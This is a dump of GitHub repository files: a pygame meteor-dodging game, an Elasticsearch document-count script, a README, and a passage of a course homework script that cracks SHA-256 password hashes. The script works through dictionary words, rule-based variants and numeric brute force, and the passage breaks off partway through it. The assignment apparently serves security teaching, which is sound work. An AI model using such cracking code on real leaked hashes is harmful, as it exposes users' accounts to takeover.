"is_vendor": false,
"language": "Python",
"length_bytes": 11122,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 332,
"path": "/Save the world.py",
"repo_name": "lakshaygpt28/Go4Hack",
"src_encoding": "UTF-8",
"text": "import pygame, time, random, sys\nfrom pygame.locals import *\n\ndisplay_height, display_width = 600, 1000\nRESOLUTION = (display_width, display_height)\nBLACK = (0, 0, 0)\nWHITE = (255,255,255)\nLAWNGREEN = (124,252,0)\nCHARTREUSE = (127,255,0)\nLIMEGREEN = (50,205,50)\n\n\nBGCOLOR = BLACK #Background color\nHIGHSCORE = 0\nball_image= pygame.image.load('images/fireball.png')\n\n\ndef load_image(name):\n return pygame.image.load(name)\n\nclass flames:\n def __init__(self):\n self.image1 = load_image(\"images/flame1.png\")\n self.image2 = load_image(\"images/flame2.png\")\n self.width, self.height = 120, 720\n self.position1 = (0, 50)\n self.position2 = (display_width - self.width, 50)\n\n def display(self):\n DISPLAYSURF.blit(self.image1, self.position1)\n DISPLAYSURF.blit(self.image2, self.position2)\n\nclass plane:\n global HEALTH ,count\n def __init__(self):\n self.image = pygame.image.load(\"images/ship.png\")\n self.width = 70\n self.height = 80\n def text_objects(self,text,font):\n textSurface = font.render(text, True, WHITE)\n return textSurface, textSurface.get_rect()\n\n def message_display(self,text):\n largeText = pygame.font.Font(\"freesansbold.ttf\",100)\n textSurf,textRect = self.text_objects(text,largeText)\n textRect.center = ((display_width/2),(display_height/2))\n DISPLAYSURF.blit(textSurf,textRect)\n #if text==\"GAME OVER\":\n\n pygame.display.update()\n\n\n\n # game starts again after health is 0\n if HEALTH <= 0:\n textSurf,textRect = self.text_objects(\"Score: \"+ str(count),largeText)\n textRect.center = ((display_width/2),(display_height/2 + textRect.height))\n DISPLAYSURF.blit(textSurf,textRect)\n pygame.display.update()\n\n time.sleep(2)\n main()\n time.sleep(2)\n game_loop()\n\n def crash(self) :\n global HEALTH\n HEALTH -= 1\n crashSound = pygame.mixer.Sound('sounds/explodedeath.wav')\n crashSound.play()\n if HEALTH <= 0:\n self.message_display(\"GAME OVER\")\n\n\n self.message_display(\"YOU CRASHED!\")\n\n\n def planeRender (self,x,y):\n DISPLAYSURF.blit(self.image,(x,y))\n\nclass fireball:\n def __init__(self,velocity):\n self.image = load_image(\"images/meteor.png\")\n self.width, self.height = 35, 45\n self.position_y = -self.height\n self.position_x = random.randint(50, display_width - self.width - 50)\n self.velocity = velocity\n self.add = 3\n\n def update_position(self):\n \"\"\"\n Updates the position of fireballs from downside of screen to top of screen\n \"\"\"\n self.position_y = -self.height\n self.position_x = random.randint(50, display_width - self.width - 50)\n\n def move(self):\n \"\"\"\n Moves the fireballs downwards\n \"\"\"\n self.position_y += self.velocity\n\n def display(self):\n DISPLAYSURF.blit(self.image, (self.position_x, self.position_y))\n\n def change_speed(self):\n self.velocity += self.add\n\ndef create_fireballs(count,velocity):\n \"\"\"\n Returns a list of 4 fireballs\n \"\"\"\n fireballs = []\n for i in range(count):\n fireballs.append(fireball(velocity))\n fireballs[i].position_y -= (i+1) * (display_height / count)\n\n return fireballs\ndef score(count):\n font = pygame.font.Font(\"freesansbold.ttf\",40)\n text = font.render(\"Score: \" + str(count),True ,WHITE)\n DISPLAYSURF.blit(text,(0,0))\ndef LEVEL(game_level):\n font = pygame.font.Font(\"freesansbold.ttf\",40)\n text = font.render(\"Level: \" + str(game_level),True ,WHITE)\n DISPLAYSURF.blit(text,(400,0))\ndef highscore(HIGHSCORE):\n font = pygame.font.Font(\"freesansbold.ttf\",40)\n text = font.render(\"Highscore: \" + str(HIGHSCORE),True ,WHITE)\n DISPLAYSURF.blit(text,(700,0))\n'''def firewall():\n wall_image = pygame.image.load('images/flames.png')\n DISPLAYSURF.blit(wall_image,(display_width-100,0))'''\ndef game_loop():\n global HEALTH,count ,HIGHSCORE\n Healthimg = pygame.image.load(\"images/healthimg.png\")\n FIREBALLSCOUNT = 4\n FIREBALLVELOCITY = 5\n fireballs = create_fireballs(FIREBALLSCOUNT,FIREBALLVELOCITY)\n jet = plane()\n x = display_width/2 - jet.width/2\n y = display_height - jet.height -50\n xchange = 0\n game_level = 1\n pygame.mixer.music.load('sounds/game.mp3')\n pygame.mixer.music.play(-1,0.0)\n while True:\n DISPLAYSURF.fill(BLACK)\n firewall = flames()\n #DISPLAYSURF.blit(firewall.image,firewall.position)\n firewall.display()\n score(count)\n highscore(HIGHSCORE)\n for i in range(HEALTH):\n DISPLAYSURF.blit(Healthimg,(200 + (i*45),(0)))\n #LEVEL(game_level)\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == K_SPACE:\n pauseGame()\n if event.key == pygame.K_LEFT :\n xchange = -10\n\n if event.key == pygame.K_RIGHT:\n xchange = 10\n if event.key == K_ESCAPE:\n terminate()\n\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n xchange = 0\n x = x + xchange\n for i in range(FIREBALLSCOUNT):\n fireballs[i].move()\n\n if fireballs[i].position_y >= display_height:\n #vanishSound = pygame.mixer.Sound('sounds/missile.wav')\n #vanishSound.play()\n fireballs[i].update_position()\n #fireball_near = (fireball_near + 1) % 4\n #score(count)\n count +=1\n #score(count)\n if count > HIGHSCORE:\n HIGHSCORE = count\n if (count-1) % 20 == 0 and count != 1:\n game_level += 1\n\n largeText = pygame.font.Font(\"freesansbold.ttf\",100)\n textSurf,textRect = jet.text_objects(\"Level: \"+ str(game_level),largeText)\n textRect.center = ((display_width/2),(display_height/2 ))\n DISPLAYSURF.blit(textSurf,textRect)\n #score(count)\n #highscore(HIGHSCORE)\n pygame.display.update()\n\n levelSound = pygame.mixer.Sound('sounds/healthup.wav')\n levelSound.play()\n time.sleep(2)\n\n for i in range(4):\n fireballs[i].change_speed()\n #score(count)\n\n # Only display below score and health bar\n if fireballs[i].position_y > 40:\n DISPLAYSURF.blit(fireballs[i].image, (fireballs[i].position_x, fireballs[i].position_y))\n LEVEL(game_level)\n firewall.display()\n jet.planeRender(x,y)\n if x < 50 or x > display_width - jet.width -50:\n pygame.mixer.music.stop()\n jet.crash()\n\n for i in range(4):\n if fireballs[i].position_y + fireballs[i].height > y and fireballs[i].position_y < y + jet.height :\n if not (x >= fireballs[i].position_x + fireballs[i].width or x + jet.width <= fireballs[i].position_x ) :\n pygame.mixer.music.stop()\n jet.crash()\n #if (x + jet.width >= fireballs[i].position_x + 25 and x + jet.width <= fireballs[i].position_x + fireballs[i].width - 25):\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n\n\n# main game loop\n# anything after the game has started is written inside this loop\ndef main():\n global DISPLAYSURF, FPSCLOCK, IMAGESDICT, BASICFONT, FPS, HEALTH,count,HIGHSCORE\n\n pygame.init()\n FPSCLOCK = pygame.time.Clock()\n FPS = 60\n HEALTH = 3\n count = 0\n DISPLAYSURF = pygame.display.set_mode(RESOLUTION)\n\n pygame.display.set_caption(\"Save The World!\")\n BASICFONT = pygame.font.Font(\"freesansbold.ttf\",22)\n\n IMAGESDICT = {'title':pygame.image.load('images/title_image.png')}\n\n startScreen()\n game_loop()\n terminate()\n\ndef startScreen():\n bgimage = pygame.image.load('images/bgi.jpg')\n bgimage = pygame.transform.scale(bgimage,RESOLUTION)\n FIREBALLSCOUNT = 7 # number of fireballs displayed on start screen\n INSTRUCTIONS = [\"Press ESC to quit at any time\",\"Press SPACE to pause\",\"Press any other key to continue...\",\"Tip : Dodge the meteors to increase score\"]\n fontObj = pygame.font.Font(\"freesansbold.ttf\",80)\n titleText = fontObj.render(\"Save the World\",True,(219, 50, 54))\n titleRect = titleText.get_rect()\n# titleRect = IMAGESDICT['title'].get_rect()\n topCoord = RESOLUTION[1]//2 - titleRect.height-50\n titleRect.top = topCoord\n titleRect.centerx = RESOLUTION[0]//2\n topCoord+=titleRect.height + 20\n displayText = []\n displayTextPos = []\n for i in range(len(INSTRUCTIONS)):\n\n displayText.append(BASICFONT.render(INSTRUCTIONS[i],True,BLACK))\n displayTextPos.append(displayText[i].get_rect())\n displayTextPos[i].center = (RESOLUTION[0]//2,topCoord)\n topCoord+=displayTextPos[i].height\n# DISPLAYSURF.blit(IMAGESDICT['title'],titleRect)\n\n # theme music\n pygame.mixer.music.load('sounds/theme.mp3')\n pygame.mixer.music.play(-1,0.0)\n\n fireballs = create_fireballs(FIREBALLSCOUNT,2)\n while True: #Main loop for the start screen\n DISPLAYSURF.fill(BGCOLOR)\n DISPLAYSURF.blit(bgimage,bgimage.get_rect())\n\n for i in range(FIREBALLSCOUNT):\n fireballs[i].move()\n\n if fireballs[i].position_y >= display_height:\n fireballs[i].update_position()\n\n DISPLAYSURF.blit(fireballs[i].image, (fireballs[i].position_x, fireballs[i].position_y))\n\n DISPLAYSURF.blit(titleText,titleRect)\n\n for i in range(len(displayText)):\n DISPLAYSURF.blit(displayText[i],displayTextPos[i])\n\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n pygame.mixer.music.stop()\n return\n\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n\ndef pauseGame():\n LARGEFONT = pygame.font.Font(\"freesansbold.ttf\",100)\n pauseText = LARGEFONT.render(\"PAUSED\",True,WHITE)\n\n textRect = pauseText.get_rect()\n textRect.center = (RESOLUTION[0]//2,RESOLUTION[1]//2)\n\n DISPLAYSURF.blit(pauseText,textRect)\n pygame.display.update()\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n elif event.key == K_SPACE:\n return\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\nif __name__ == '__main__':\n main()\n"
}
] | 2 |
ravvas/Pyelastic | https://github.com/ravvas/Pyelastic | f9facf9f159945d70d4651396b03e36798b61b0f | a0080ccb41539245a381427689a784b720fbc040 | daed0596ac679281db036c3c0227b4407c06fdd9 | refs/heads/master | 2016-09-14T19:28:00.715310 | 2016-04-21T09:01:31 | 2016-04-21T09:01:31 | 56,522,308 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5684523582458496,
"alphanum_fraction": 0.6041666865348816,
"avg_line_length": 37.25,
"blob_id": "08b9f14b557f9bd1f7082d739aacfa0654888322",
"content_id": "9d56b15042b097ef16e6e7e2d5ba5014f7091142",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 336,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 8,
"path": "/elastictypecount.py",
"repo_name": "ravvas/Pyelastic",
"src_encoding": "UTF-8",
"text": "from elasticsearch.client import Elasticsearch\r\nhost = \"10.9.238.35\"\r\nport = \"9200\"\r\nes = Elasticsearch(host=host, port=port)\r\nres = es.indices.get_mapping()\r\nfor index in res :\r\n for type in res[index][\"mappings\"] :\r\n print index + \",\" + type + \",\" + str(es.count(index=index,doc_type=type)[\"count\"])\r\n \r\n \r\n\r\n"
},
{
"alpha_fraction": 0.7708333134651184,
"alphanum_fraction": 0.7766203880310059,
"avg_line_length": 56.266666412353516,
"blob_id": "6084632bb6d3fd4fd95529e62a7414fc6f782bc8",
"content_id": "16cedef126ea0c8aa2649fec6290b826530a9c1c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 864,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 15,
"path": "/README.md",
"repo_name": "ravvas/Pyelastic",
"src_encoding": "UTF-8",
"text": "# Pyelastic\nThis Respository is meant for frequently used Utility functions created while working on an ELK Project.\nThese are very simple code with as much documentation added for users to fork it and customize for their use. \n\n1) Fetch all fields names across all indices documents of an ElasticSearch Cluster. \n\n Fetch Mappings for all indices. \n Extract the field names across all indices from mappings document \n For each field check if the field exist in elastic search \n Output into an CSV file with Index Name, Field Name and Type. \n\n2) Get the number of documents available in each type across all indices. \n3) Get all the documents which don't have a specific string/sentence in a field. \n4) Read document from an index/type/id, replace few \"variable\" fields in the json with values and insert that document into another index/type/id. \n5) \n \n"
}
] | 2 |
pmccabe5/CSCI345 | https://github.com/pmccabe5/CSCI345 | 1194f4181cd3365ac7283f240a93c6ea3286fb6f | a93814674892b5c789a33c8cf8fa920390fb977a | a112c71efb188fde5dd1f870aba4b3ab1eb61319 | refs/heads/master | 2022-04-18T06:51:15.867624 | 2020-04-02T03:40:28 | 2020-04-02T03:40:28 | 233,885,693 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5366795659065247,
"alphanum_fraction": 0.5755102038383484,
"avg_line_length": 41.69230651855469,
"blob_id": "caa38ccb48c0cc8771fd30ecf709ffce9506bcee",
"content_id": "06e339a7ff620e4dd7e0f707559ce7c29d50cdbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 27195,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 637,
"path": "/Clever_McCabe_HW1/Clever_McCabe_passwd_cracking.py",
"repo_name": "pmccabe5/CSCI345",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n#Clever, Clare & McCabe, Patrick\n#HW1, Spring 2020\n\n# libraries needed for execution: hashlib, threading, and termcolor (for aesthetic purpose)\nimport hashlib\nfrom threading import *\nfrom termcolor import colored\n\n# dictionaries for rules one, two, and three\nruleOneDictionary = {}\nruleTwoDictionary = {}\nruleThreeDictionary = {}\n\n# individual dictionaries for rule four based on length of the password before hashing\nruleFourDictionary1to3 = {}\nruleFourDictionary4 = {}\nruleFourDictionary5 = {}\nruleFourDictionary6 = {}\nruleFourDictionary7_0 = {}\nruleFourDictionary7_1 = {}\nruleFourDictionary7_2 = {}\nruleFourDictionary7_3 = {}\nruleFourDictionary7_4 = {}\nruleFourDictionary7_5 = {}\nruleFourDictionary7_6 = {}\nruleFourDictionary7_7 = {}\nruleFourDictionary7_8 = {}\nruleFourDictionary7_9 = {}\n\n# dictionary specifically for rule five\nruleFiveDictionary = {}\n\n# booleans to keep track of whether or not the hash tables are done generating\nwaitUntilDoneBuilding = [True, True, True, True, True, True, True, True, \nTrue, True, True, True, True, True, True]\n\n# symbols that are included in rule four\nsymbols = [\"*\", \"~\", \"!\", \"#\"]\n\npasswordHashes = []\n\n# files needed for the operation of the program\nwordlist = open('words.txt', 'r')\npasswordDump = open('passwordDump.txt', 'r')\noutfile = open('cracked-passwords-Clever-McCabe.txt', 'w')\npasswordsCracked = 0\n\n'''\nThis method generates the hashed passords in the form of \na hash table, usng the dictionary data type for rules one, \nthree, and five. These rules are generated at the same time\ndue to the word file, /usr/share/dict/words, being open and being used\nin all three of the rules. \n'''\n\ndef ruleOneAndThreeAndFivePasswords():\n\n # iterates through /usr/share/dict/words\n for line in wordlist:\n\n # fulltext is an alias for line so it can be used without capitalization\n # or a number added on for rule one. fulltext is used for both rules three \n # and five. New line character is stripped with the .strip('\\n')\n\n fulltext = line.strip('\\n')\n\n # rule5Sha256 is the process of hashing fulltext before insertion into\n # the hash table\n rule5Sha256 = hashlib.sha256()\n rule5Sha256.update(fulltext.encode())\n rule5Sha256 = rule5Sha256.hexdigest()\n ruleFiveDictionary[rule5Sha256] = fulltext \n if len(fulltext) == 7:\n\n # line is taken from the general file iterator and is only used for rule \n # three due to the capitalization and number appending to satisfy rule one\n line = line.capitalize()\n line = line.strip('\\n')\n\n # appending of single digit to line before hashing and storage \n # into the dictionary\n for count in range(10):\n temp = line.strip('\\n')\n temp = temp + str(count)\n sha256 = hashlib.sha256()\n sha256.update(temp.encode())\n sha256 = sha256.hexdigest()\n ruleOneDictionary[sha256] = temp\n\n # if statement used to satisfy rule three. fulltext is used in order to have \n # a clean input for the SHA256 hashing and replacement of 'a' to '@' as well\n # as 'l' to '1' \n elif len(fulltext) == 5 and (('a' in fulltext) or (('l' in fulltext))):\n fulltext = fulltext.replace('a', '@')\n fulltext = fulltext.replace('l', '1')\n rule3Sha256 = hashlib.sha256()\n rule3Sha256.update(fulltext.encode())\n rule3Sha256 = rule3Sha256.hexdigest()\n ruleThreeDictionary[rule3Sha256] = fulltext\n print(colored('DONE: Rule One, Three and Five hash tables created', 'blue'))\n waitUntilDoneBuilding[3] = False\n \n'''\nThis method generates the hashes for rules two and four, as they are \nnumeric based passwords up to four digits in length. \nRule two specifies the location of a special character\ndefined as one of the following characters [\"*\", \"~\", \"!\", \"#\"] and a number of\nfour digits in length. Rule four generates passwords of numbers up to seven\ndigits in length without any special characters added. Also, the generation of \nhashes is split up into smaller functions of varying length to improve on the\nefficiency of the program.\n'''\n\ndef ruleTwoAndRuleFourLength4():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(4):\n word = symbols[e] + str(a) + str(b) + str(c) + str(d)\n rule2Sha256 = hashlib.sha256()\n rule2Sha256.update(word.encode())\n rule2Sha256 = rule2Sha256.hexdigest()\n ruleTwoDictionary[rule2Sha256] = word\n number = str(a) + str(b) + str(c) + str(d)\n rule4For4Sha256 = hashlib.sha256()\n rule4For4Sha256.update(number.encode())\n rule4For4Sha256 = rule4For4Sha256.hexdigest()\n ruleFourDictionary4[rule4For4Sha256] = number\n print(colored('DONE: Rule Two hash table created', 'blue'))\n waitUntilDoneBuilding[4] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes from one to 3 digits in length for rule four, \nwithout any of the special characters from rule two.\n'''\n\ndef ruleFourLength1to3():\n for a in range(10):\n number = str(a)\n rule4For1to3Sha256 = hashlib.sha256()\n rule4For1to3Sha256.update(number.encode())\n rule4For1to3Sha256 = rule4For1to3Sha256.hexdigest()\n ruleFourDictionary1to3[rule4For1to3Sha256] = number\n for a in range(10):\n for b in range(10):\n number = str(a) + str(b)\n rule4For1to3Sha256 = hashlib.sha256()\n rule4For1to3Sha256.update(number.encode())\n rule4For1to3Sha256 = rule4For1to3Sha256.hexdigest()\n ruleFourDictionary1to3[rule4For1to3Sha256] = number\n for a in range(10):\n for b in range(10):\n for c in range(10):\n number = str(a) + str(b) + str(c)\n rule4For1to3Sha256 = hashlib.sha256()\n rule4For1to3Sha256.update(number.encode())\n rule4For1to3Sha256 = rule4For1to3Sha256.hexdigest()\n ruleFourDictionary1to3[rule4For1to3Sha256] = number\n waitUntilDoneBuilding[5] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length five for rule four, \nwithout any of the special characters from rule two.\n'''\n\ndef ruleFourLength5():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e)\n rule4For5Sha256 = hashlib.sha256()\n rule4For5Sha256.update(number.encode())\n rule4For5Sha256 = rule4For5Sha256.hexdigest()\n ruleFourDictionary5[rule4For5Sha256] = number\n waitUntilDoneBuilding[2] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two.\nThe method also lets the user see the current status of the\nlist generation. This method also prints out updates for the user\nin order to see where the program is currently.\n=======\n\n'''\n\ndef ruleFourLength6andLength7Start0():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f)\n rule4For6Sha256 = hashlib.sha256()\n rule4For6Sha256.update(number.encode())\n rule4For6Sha256 = rule4For6Sha256.hexdigest()\n ruleFourDictionary6[rule4For6Sha256] = number\n\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(0)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_0[rule4For7Sha256] = number\n\n if(number == '1000000'):\n print(colored(\"Current Status:\", 'magenta'))\n print(colored(\"8,999,999 Left . . .\", 'magenta'))\n elif(number == '2000000'):\n print(colored(\"7,999,999 Left . . .\", 'magenta'))\n elif(number == '3000000'):\n print(colored(\"6,999,999 Left . . .\", 'magenta'))\n elif(number == '4000000'):\n print(colored(\"5,999,999 Left . . .\", 'magenta'))\n elif(number == '5000000'):\n print(colored(\"4,999,999 Left . . .\", 'magenta'))\n elif(number == '6000000'):\n print(colored(\"3,999,999 Left . . .\", 'magenta'))\n elif(number == '7000000'):\n print(colored(\"2,999,999 Left . . .\", 'magenta'))\n elif(number == '8000000'):\n print(colored(\"1,999,999 Left . . .\", 'magenta'))\n elif(number == '9000000'):\n print(colored(\"999,999 Left . . .\", 'magenta'))\n waitUntilDoneBuilding[1] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two.\n'''\n\ndef ruleFourLength7Start1():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(1)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_1[rule4For7Sha256] = number\n waitUntilDoneBuilding[0] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start2():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(2)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_2[rule4For7Sha256] = number\n waitUntilDoneBuilding[6] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start3():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(3)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_3[rule4For7Sha256] = number\n waitUntilDoneBuilding[7] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start4():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(4)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_4[rule4For7Sha256] = number\n waitUntilDoneBuilding[8] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start5():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(5)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_5[rule4For7Sha256] = number\n waitUntilDoneBuilding[9] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start6():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(6)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_6[rule4For7Sha256] = number\n waitUntilDoneBuilding[10] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start7():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(7)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_7[rule4For7Sha256] = number\n waitUntilDoneBuilding[11] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start8():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(8)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_8[rule4For7Sha256] = number\n waitUntilDoneBuilding[12] = False\n\n'''\nThis method continues from the previous method for rule four\nand generates hashes up to length seven for rule four, \nwithout any of the special characters from rule two. \nThis method is segmented to improve on runtime\n'''\n\ndef ruleFourLength7Start9():\n for a in range(10):\n for b in range(10):\n for c in range(10):\n for d in range(10):\n for e in range(10):\n for f in range(10):\n number = str(a) + str(b) + str(c) + str(d) + str(e) + str(f) + str(9)\n rule4For7Sha256 = hashlib.sha256()\n rule4For7Sha256.update(number.encode())\n rule4For7Sha256 = rule4For7Sha256.hexdigest()\n ruleFourDictionary7_9[rule4For7Sha256] = number\n waitUntilDoneBuilding[13] = False\n\ndef readInPasswords():\n for line in passwordDump.readlines():\n password = line.split(':')[1].strip('\\n')\n passwordHashes.append(password)\n waitUntilDoneBuilding[14] = False\n print(colored('DONE: All password hashes have been read into an array', 'blue'))\n\n'''\nMain method is designed to initiate all the threads for the program as well as read in the passwords from \nthe specified hash file in the README. The other functionality of the main method is to compare the hashes\nthat have been loaded into the program to the hashes stored in the hashtables.\n''' \n\n\ndef main():\n print(colored('The program will begin by creating all the threads to build the hash table rule sets.', 'yellow'))\n\n threadZero = Thread(target = ruleFourLength7Start1)\n threadZero.start()\n\n threadSix = Thread(target = ruleFourLength7Start2)\n threadSix.start()\n\n threadSeven = Thread(target = ruleFourLength7Start3)\n threadSeven.start()\n\n threadEight = Thread(target = ruleFourLength7Start4)\n threadEight.start()\n\n threadNine = Thread(target = ruleFourLength7Start5)\n threadNine.start()\n\n threadTen = Thread(target = ruleFourLength7Start6)\n threadTen.start()\n\n threadEleven = Thread(target = ruleFourLength7Start7)\n threadEleven.start()\n\n threadTwelve = Thread(target = ruleFourLength7Start8)\n threadTwelve.start()\n\n threadThirteen = Thread(target = ruleFourLength7Start9)\n threadThirteen.start()\n\n threadOne = Thread(target = ruleFourLength6andLength7Start0)\n threadOne.start()\n\n threadTwo = Thread(target = ruleFourLength5)\n threadTwo.start()\n\n threadThree = Thread(target = ruleOneAndThreeAndFivePasswords)\n threadThree.start()\n\n threadFour = Thread(target = ruleTwoAndRuleFourLength4)\n threadFour.start()\n\n threadFive = Thread(target = ruleFourLength1to3)\n threadFive.start()\n\n threadFourteen = Thread(target = readInPasswords)\n threadFourteen.start()\n\n print(colored('DONE: All threads have been created', 'blue'))\n\n print(colored('Please wait. . . The program is currently generating the hash table rule sets.', 'yellow'))\n print(colored('Periodic updates will be given along the way displaying the programs progress.', 'yellow'))\n \n while(waitUntilDoneBuilding[0] == True or waitUntilDoneBuilding[1] == True or waitUntilDoneBuilding[2] == True \n or waitUntilDoneBuilding[3] == True or waitUntilDoneBuilding[4] == True \n or waitUntilDoneBuilding[5] == True or waitUntilDoneBuilding[6] == True or waitUntilDoneBuilding[7] == True \n or waitUntilDoneBuilding[8] == True or waitUntilDoneBuilding[9] == True or waitUntilDoneBuilding[10] == True\n or waitUntilDoneBuilding[11] == True or waitUntilDoneBuilding[12] == True or waitUntilDoneBuilding[13] == True\n or waitUntilDoneBuilding[14] == True):\n spin = True\n \n print(colored('DONE: All hash table rule sets have been created', 'blue'))\n\n for hashedPassword in passwordHashes:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleOneDictionary[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleOneDictionary[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleTwoDictionary[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleTwoDictionary[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleThreeDictionary[hashedPassword], 'green'))\n outfile.write(hashedPassword + ':' + ruleThreeDictionary[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary1to3[hashedPassword]), 'green')\n outfile.write(hashedPassword + ':' + ruleFourDictionary1to3[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary1to3[hashedPassword],'green'))\n outfile.write(hashedPassword + ':' + ruleFourDictionary1to3[hashedPassword] + '\\n')\n hashFound = True\n except:\n hashFound = False\n if(hashFound == False):\n try:\n print(colored(hashedPassword + ':' + ruleFourDictionary4[hashedPassword], 'green'))\n outfile.write(hashedPassword 